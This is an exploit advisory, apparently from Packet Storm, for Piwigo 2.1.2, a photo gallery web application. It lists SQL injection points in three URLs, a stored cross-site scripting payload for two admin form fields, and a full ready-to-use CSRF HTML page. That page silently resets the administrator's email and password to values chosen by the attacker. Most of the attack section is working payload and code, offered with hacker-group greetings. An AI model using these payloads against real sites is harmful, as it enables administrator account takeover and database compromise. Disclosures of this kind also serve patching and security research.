Piwigo version 2.1.2 suffers from cross site request forgery, cross site scripting and remote SQL injection vulnerabilities.
28658223e8717711723c5561cdd621ea5afc21de0d1b7921146a8ddfbf3e0689
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 Sweet the Algerian Haxxor 0
1 ###################################### 0
0 1
1 [+]Exploit Title: piwigo-2.1.2 Multiple vulnerabilities 0
0 [+]Date: 11/09/2010 1
1 [+]Author: Sweet 0
0 [+]Contact : charif38@hotmail.fr 0
1 [+]Software Link: http://fr.piwigo.org 0
0 [+]Download:http://fr.piwigo.org/releases/2.1.2 1
1 [+]Version:2.1.2 0
0 [+]Tested on: WinXp sp3 1
1 [+]Risk : Hight 0
0 [+]Description : Piwigo is a software for picture web gallerie 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
--=Sql injection=--
http://www.target.com/path/comments.php?keyword=charif38@hotmail.fr&author=sweet&cat=1[SQLi]&since=1&sort_by=date&sort_order=DESC&items_number=5
http://www.target.com/path/picture.php?1sweet[SQLi]&action=rate=0
http://www.target.com/path/index.php?/search/10[SQli]
--=Stored Xss=--
Admin login required
Attack pattern : >'<script>alert("Sweet")</script>
http://www.target.com/path/admin.php?page=tags
The POST variable "Nouveau tag" is vulnerable to a stored xss attack
http://www.target.com/path/admin.php?page=cat_list
The POST variable "Ajouter une catégorie virtuelle" is vulnerable to a stored xss attack
--=CSRF=--
Change admin password exploit
<html>
<body>
<h1>Piwigo-2.1.2 Change admin password CSRF </h1>
<form method="POST" name="form0" action="http://www.target.com/path/admin.php?page=profile&user_id=1">
<input type="hidden" name="redirect" value="admin.php?page"/>
<input type="hidden" name="mail_address" value="charif38@hotmail.fr"/> <!-- Your email here -->
<input type="hidden" name="use_new_pwd" value="sweet"/> <!-- Your password here -->
<input type="hidden" name="passwordConf" value="sweet"/> <!-- Your password here -->
<input type="hidden" name="nb_image_line" value="5"/>
<input type="hidden" name="nb_line_page" value="3"/>
<input type="hidden" name="theme" value="Sylvia"/>
<input type="hidden" name="language" value="fr_FR"/>
<input type="hidden" name="recent_period" value="7"/>
<input type="hidden" name="expand" value="false"/>
<input type="hidden" name="show_nb_comments" value="false"/>
<input type="hidden" name="show_nb_hits" value="false"/>
<input type="hidden" name="maxwidth" value=""/>
<input type="hidden" name="maxheight" value=""/>
<p> Push the Button <input type="submit" name="validate" value="Valider"/> </p>
</form>
<form method="GET" name="form1" action="http://www.target.com/path/admin.php?page=user_list">
<input type="hidden" name="name" value="value"/>
</form>
</body>
</html>
[ thx and RIP to Milw0rm.com , JF - Hamst0r - Keystroke you always be right here 3> ] , inj3ct0r.com , exploit-db.com
1,2,3 VIVA LALGERIE
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed